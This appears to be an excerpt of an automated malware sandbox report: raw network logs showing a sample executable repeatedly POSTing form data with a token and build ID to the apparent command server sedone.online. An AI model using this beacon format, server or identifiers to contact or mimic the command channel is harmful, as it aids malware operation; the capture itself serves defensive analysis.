                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                Host: sedone.online
                                                                                                                                                                                                                                                Content-Length: 1837
                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                2024-12-16 14:40:27 UTC1837OUTData Raw: 2d 2d 2d 2d 2d 2d 39 52 49 57 34 45 43 4a 35 58 42 41 41 49 35 38 51 49 45 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 32 61 66 61 30 62 64 33 34 33 61 64 31 39 66 39 32 30 30 61 31 38 31 66 61 38 33 34 38 39 61 61 0d 0a 2d 2d 2d 2d 2d 2d 39 52 49 57 34 45 43 4a 35 58 42 41 41 49 35 38 51 49 45 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 65 34 31 31 63 66 36 32 62 63 62 61 30 34 64 37 34 66 63 36 62 35 30 35 62 39 32 33 35 34 30 34 0d 0a 2d 2d 2d 2d 2d 2d 39 52 49 57 34 45 43 4a 35 58 42 41 41 49 35 38 51 49 45 43 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                Data Ascii: ------9RIW4ECJ5XBAAI58QIECContent-Disposition: form-data; name="token"2afa0bd343ad19f9200a181fa83489aa------9RIW4ECJ5XBAAI58QIECContent-Disposition: form-data; name="build_id"e411cf62bcba04d74fc6b505b9235404------9RIW4ECJ5XBAAI58QIECCont
                                                                                                                                                                                                                                                2024-12-16 14:40:28 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                                Date: Mon, 16 Dec 2024 14:40:28 GMT
                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                2024-12-16 14:40:28 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                Data Ascii: 2ok0


                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                44192.168.2.749971116.203.12.1144432000C:\Users\user\Desktop\dZKPE9gotO.exe
                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                2024-12-16 14:40:28 UTC326OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                Content-Type: multipart/form-data; boundary=----L6XTRQ1VS0ZM7Q9HD26X
                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                Host: sedone.online
                                                                                                                                                                                                                                                Content-Length: 1837
                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                2024-12-16 14:40:28 UTC1837OUTData Raw: 2d 2d 2d 2d 2d 2d 4c 36 58 54 52 51 31 56 53 30 5a 4d 37 51 39 48 44 32 36 58 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 32 61 66 61 30 62 64 33 34 33 61 64 31 39 66 39 32 30 30 61 31 38 31 66 61 38 33 34 38 39 61 61 0d 0a 2d 2d 2d 2d 2d 2d 4c 36 58 54 52 51 31 56 53 30 5a 4d 37 51 39 48 44 32 36 58 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 65 34 31 31 63 66 36 32 62 63 62 61 30 34 64 37 34 66 63 36 62 35 30 35 62 39 32 33 35 34 30 34 0d 0a 2d 2d 2d 2d 2d 2d 4c 36 58 54 52 51 31 56 53 30 5a 4d 37 51 39 48 44 32 36 58 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                Data Ascii: ------L6XTRQ1VS0ZM7Q9HD26XContent-Disposition: form-data; name="token"2afa0bd343ad19f9200a181fa83489aa------L6XTRQ1VS0ZM7Q9HD26XContent-Disposition: form-data; name="build_id"e411cf62bcba04d74fc6b505b9235404------L6XTRQ1VS0ZM7Q9HD26XCont
                                                                                                                                                                                                                                                2024-12-16 14:40:29 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                                Date: Mon, 16 Dec 2024 14:40:29 GMT
                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                2024-12-16 14:40:29 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                Data Ascii: 2ok0


                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                45192.168.2.749978116.203.12.1144432000C:\Users\user\Desktop\dZKPE9gotO.exe
                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                2024-12-16 14:40:30 UTC326OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                Content-Type: multipart/form-data; boundary=----J5F3OPPZC2V3EUS26X4O
                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                Host: sedone.online
                                                                                                                                                                                                                                                Content-Length: 1837
                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                2024-12-16 14:40:30 UTC1837OUTData Raw: 2d 2d 2d 2d 2d 2d 4a 35 46 33 4f 50 50 5a 43 32 56 33 45 55 53 32 36 58 34 4f 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 32 61 66 61 30 62 64 33 34 33 61 64 31 39 66 39 32 30 30 61 31 38 31 66 61 38 33 34 38 39 61 61 0d 0a 2d 2d 2d 2d 2d 2d 4a 35 46 33 4f 50 50 5a 43 32 56 33 45 55 53 32 36 58 34 4f 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 65 34 31 31 63 66 36 32 62 63 62 61 30 34 64 37 34 66 63 36 62 35 30 35 62 39 32 33 35 34 30 34 0d 0a 2d 2d 2d 2d 2d 2d 4a 35 46 33 4f 50 50 5a 43 32 56 33 45 55 53 32 36 58 34 4f 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                Data Ascii: ------J5F3OPPZC2V3EUS26X4OContent-Disposition: form-data; name="token"2afa0bd343ad19f9200a181fa83489aa------J5F3OPPZC2V3EUS26X4OContent-Disposition: form-data; name="build_id"e411cf62bcba04d74fc6b505b9235404------J5F3OPPZC2V3EUS26X4OCont
                                                                                                                                                                                                                                                2024-12-16 14:40:31 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                                Date: Mon, 16 Dec 2024 14:40:31 GMT
                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                2024-12-16 14:40:31 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                Data Ascii: 2ok0


                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                46192.168.2.749979116.203.12.1144432000C:\Users\user\Desktop\dZKPE9gotO.exe
                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                2024-12-16 14:40:31 UTC326OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                Content-Type: multipart/form-data; boundary=----L68Y5XTJ5XBAIMOP8G4O
                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                Host: sedone.online
                                                                                                                                                                                                                                                Content-Length: 1825
                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                2024-12-16 14:40:31 UTC1825OUTData Raw: 2d 2d 2d 2d 2d 2d 4c 36 38 59 35 58 54 4a 35 58 42 41 49 4d 4f 50 38 47 34 4f 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 32 61 66 61 30 62 64 33 34 33 61 64 31 39 66 39 32 30 30 61 31 38 31 66 61 38 33 34 38 39 61 61 0d 0a 2d 2d 2d 2d 2d 2d 4c 36 38 59 35 58 54 4a 35 58 42 41 49 4d 4f 50 38 47 34 4f 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 65 34 31 31 63 66 36 32 62 63 62 61 30 34 64 37 34 66 63 36 62 35 30 35 62 39 32 33 35 34 30 34 0d 0a 2d 2d 2d 2d 2d 2d 4c 36 38 59 35 58 54 4a 35 58 42 41 49 4d 4f 50 38 47 34 4f 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                Data Ascii: ------L68Y5XTJ5XBAIMOP8G4OContent-Disposition: form-data; name="token"2afa0bd343ad19f9200a181fa83489aa------L68Y5XTJ5XBAIMOP8G4OContent-Disposition: form-data; name="build_id"e411cf62bcba04d74fc6b505b9235404------L68Y5XTJ5XBAIMOP8G4OCont
                                                                                                                                                                                                                                                2024-12-16 14:40:32 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                                Date: Mon, 16 Dec 2024 14:40:32 GMT
                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                2024-12-16 14:40:32 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                Data Ascii: 2ok0


                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                47192.168.2.749985116.203.12.1144432000C:\Users\user\Desktop\dZKPE9gotO.exe
                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                2024-12-16 14:40:33 UTC326OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                Content-Type: multipart/form-data; boundary=----M7Y5PZUKXLNYU3OHDBIM
                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                Host: sedone.online
                                                                                                                                                                                                                                                Content-Length: 1837
                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                2024-12-16 14:40:33 UTC1837OUTData Raw: 2d 2d 2d 2d 2d 2d 4d 37 59 35 50 5a 55 4b 58 4c 4e 59 55 33 4f 48 44 42 49 4d 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 32 61 66 61 30 62 64 33 34 33 61 64 31 39 66 39 32 30 30 61 31 38 31 66 61 38 33 34 38 39 61 61 0d 0a 2d 2d 2d 2d 2d 2d 4d 37 59 35 50 5a 55 4b 58 4c 4e 59 55 33 4f 48 44 42 49 4d 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 65 34 31 31 63 66 36 32 62 63 62 61 30 34 64 37 34 66 63 36 62 35 30 35 62 39 32 33 35 34 30 34 0d 0a 2d 2d 2d 2d 2d 2d 4d 37 59 35 50 5a 55 4b 58 4c 4e 59 55 33 4f 48 44 42 49 4d 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                Data Ascii: ------M7Y5PZUKXLNYU3OHDBIMContent-Disposition: form-data; name="token"2afa0bd343ad19f9200a181fa83489aa------M7Y5PZUKXLNYU3OHDBIMContent-Disposition: form-data; name="build_id"e411cf62bcba04d74fc6b505b9235404------M7Y5PZUKXLNYU3OHDBIMCont
                                                                                                                                                                                                                                                2024-12-16 14:40:34 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                                Date: Mon, 16 Dec 2024 14:40:34 GMT
                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                2024-12-16 14:40:34 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                Data Ascii: 2ok0


                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                48192.168.2.749991116.203.12.1144432000C:\Users\user\Desktop\dZKPE9gotO.exe
                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                2024-12-16 14:40:34 UTC326OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                Content-Type: multipart/form-data; boundary=----O8Q168Y5PH47YUK6FU3E
                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                Host: sedone.online
                                                                                                                                                                                                                                                Content-Length: 1825
                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                2024-12-16 14:40:34 UTC1825OUTData Raw: 2d 2d 2d 2d 2d 2d 4f 38 51 31 36 38 59 35 50 48 34 37 59 55 4b 36 46 55 33 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 32 61 66 61 30 62 64 33 34 33 61 64 31 39 66 39 32 30 30 61 31 38 31 66 61 38 33 34 38 39 61 61 0d 0a 2d 2d 2d 2d 2d 2d 4f 38 51 31 36 38 59 35 50 48 34 37 59 55 4b 36 46 55 33 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 65 34 31 31 63 66 36 32 62 63 62 61 30 34 64 37 34 66 63 36 62 35 30 35 62 39 32 33 35 34 30 34 0d 0a 2d 2d 2d 2d 2d 2d 4f 38 51 31 36 38 59 35 50 48 34 37 59 55 4b 36 46 55 33 45 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                Data Ascii: ------O8Q168Y5PH47YUK6FU3EContent-Disposition: form-data; name="token"2afa0bd343ad19f9200a181fa83489aa------O8Q168Y5PH47YUK6FU3EContent-Disposition: form-data; name="build_id"e411cf62bcba04d74fc6b505b9235404------O8Q168Y5PH47YUK6FU3ECont
                                                                                                                                                                                                                                                2024-12-16 14:40:35 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                                Date: Mon, 16 Dec 2024 14:40:35 GMT
                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                2024-12-16 14:40:35 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                Data Ascii: 2ok0


                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                49192.168.2.749995116.203.12.1144432000C:\Users\user\Desktop\dZKPE9gotO.exe
                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                2024-12-16 14:40:36 UTC326OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                Content-Type: multipart/form-data; boundary=----MYM7YMOHLXBIEUAIMOP8
                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                Host: sedone.online
                                                                                                                                                                                                                                                Content-Length: 1825
                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                2024-12-16 14:40:36 UTC1825OUTData Raw: 2d 2d 2d 2d 2d 2d 4d 59 4d 37 59 4d 4f 48 4c 58 42 49 45 55 41 49 4d 4f 50 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 32 61 66 61 30 62 64 33 34 33 61 64 31 39 66 39 32 30 30 61 31 38 31 66 61 38 33 34 38 39 61 61 0d 0a 2d 2d 2d 2d 2d 2d 4d 59 4d 37 59 4d 4f 48 4c 58 42 49 45 55 41 49 4d 4f 50 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 65 34 31 31 63 66 36 32 62 63 62 61 30 34 64 37 34 66 63 36 62 35 30 35 62 39 32 33 35 34 30 34 0d 0a 2d 2d 2d 2d 2d 2d 4d 59 4d 37 59 4d 4f 48 4c 58 42 49 45 55 41 49 4d 4f 50 38 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                Data Ascii: ------MYM7YMOHLXBIEUAIMOP8Content-Disposition: form-data; name="token"2afa0bd343ad19f9200a181fa83489aa------MYM7YMOHLXBIEUAIMOP8Content-Disposition: form-data; name="build_id"e411cf62bcba04d74fc6b505b9235404------MYM7YMOHLXBIEUAIMOP8Cont
                                                                                                                                                                                                                                                2024-12-16 14:40:37 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                                Date: Mon, 16 Dec 2024 14:40:37 GMT
                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                2024-12-16 14:40:37 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                Data Ascii: 2ok0


                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                50192.168.2.749998116.203.12.1144432000C:\Users\user\Desktop\dZKPE9gotO.exe
                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                2024-12-16 14:40:37 UTC326OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                Content-Type: multipart/form-data; boundary=----Y5X47Q90HDJMYU3EKN7Q
                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                Host: sedone.online
                                                                                                                                                                                                                                                Content-Length: 1817
                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                2024-12-16 14:40:37 UTC1817OUTData Raw: 2d 2d 2d 2d 2d 2d 59 35 58 34 37 51 39 30 48 44 4a 4d 59 55 33 45 4b 4e 37 51 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 32 61 66 61 30 62 64 33 34 33 61 64 31 39 66 39 32 30 30 61 31 38 31 66 61 38 33 34 38 39 61 61 0d 0a 2d 2d 2d 2d 2d 2d 59 35 58 34 37 51 39 30 48 44 4a 4d 59 55 33 45 4b 4e 37 51 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 65 34 31 31 63 66 36 32 62 63 62 61 30 34 64 37 34 66 63 36 62 35 30 35 62 39 32 33 35 34 30 34 0d 0a 2d 2d 2d 2d 2d 2d 59 35 58 34 37 51 39 30 48 44 4a 4d 59 55 33 45 4b 4e 37 51 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                Data Ascii: ------Y5X47Q90HDJMYU3EKN7QContent-Disposition: form-data; name="token"2afa0bd343ad19f9200a181fa83489aa------Y5X47Q90HDJMYU3EKN7QContent-Disposition: form-data; name="build_id"e411cf62bcba04d74fc6b505b9235404------Y5X47Q90HDJMYU3EKN7QCont
                                                                                                                                                                                                                                                2024-12-16 14:40:38 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                                Date: Mon, 16 Dec 2024 14:40:38 GMT
                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                2024-12-16 14:40:38 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                Data Ascii: 2ok0


                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                51192.168.2.750004116.203.12.1144432000C:\Users\user\Desktop\dZKPE9gotO.exe
                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                2024-12-16 14:40:39 UTC326OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                Content-Type: multipart/form-data; boundary=----TJMOPHD2DTRQIM7Q16X4
                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                Host: sedone.online
                                                                                                                                                                                                                                                Content-Length: 1817
                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                2024-12-16 14:40:39 UTC1817OUTData Raw: 2d 2d 2d 2d 2d 2d 54 4a 4d 4f 50 48 44 32 44 54 52 51 49 4d 37 51 31 36 58 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 32 61 66 61 30 62 64 33 34 33 61 64 31 39 66 39 32 30 30 61 31 38 31 66 61 38 33 34 38 39 61 61 0d 0a 2d 2d 2d 2d 2d 2d 54 4a 4d 4f 50 48 44 32 44 54 52 51 49 4d 37 51 31 36 58 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 65 34 31 31 63 66 36 32 62 63 62 61 30 34 64 37 34 66 63 36 62 35 30 35 62 39 32 33 35 34 30 34 0d 0a 2d 2d 2d 2d 2d 2d 54 4a 4d 4f 50 48 44 32 44 54 52 51 49 4d 37 51 31 36 58 34 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                Data Ascii: ------TJMOPHD2DTRQIM7Q16X4Content-Disposition: form-data; name="token"2afa0bd343ad19f9200a181fa83489aa------TJMOPHD2DTRQIM7Q16X4Content-Disposition: form-data; name="build_id"e411cf62bcba04d74fc6b505b9235404------TJMOPHD2DTRQIM7Q16X4Cont
                                                                                                                                                                                                                                                2024-12-16 14:40:40 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                                Date: Mon, 16 Dec 2024 14:40:40 GMT
                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                2024-12-16 14:40:40 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                Data Ascii: 2ok0


                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                52192.168.2.750008116.203.12.1144432000C:\Users\user\Desktop\dZKPE9gotO.exe
                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                2024-12-16 14:40:40 UTC326OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                Content-Type: multipart/form-data; boundary=----TJMOPHD2DTRQIM7Q16X4
                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                Host: sedone.online
                                                                                                                                                                                                                                                Content-Length: 1817
                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                2024-12-16 14:40:40 UTC1817OUTData Raw: 2d 2d 2d 2d 2d 2d 54 4a 4d 4f 50 48 44 32 44 54 52 51 49 4d 37 51 31 36 58 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 32 61 66 61 30 62 64 33 34 33 61 64 31 39 66 39 32 30 30 61 31 38 31 66 61 38 33 34 38 39 61 61 0d 0a 2d 2d 2d 2d 2d 2d 54 4a 4d 4f 50 48 44 32 44 54 52 51 49 4d 37 51 31 36 58 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 65 34 31 31 63 66 36 32 62 63 62 61 30 34 64 37 34 66 63 36 62 35 30 35 62 39 32 33 35 34 30 34 0d 0a 2d 2d 2d 2d 2d 2d 54 4a 4d 4f 50 48 44 32 44 54 52 51 49 4d 37 51 31 36 58 34 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                Data Ascii: ------TJMOPHD2DTRQIM7Q16X4Content-Disposition: form-data; name="token"2afa0bd343ad19f9200a181fa83489aa------TJMOPHD2DTRQIM7Q16X4Content-Disposition: form-data; name="build_id"e411cf62bcba04d74fc6b505b9235404------TJMOPHD2DTRQIM7Q16X4Cont
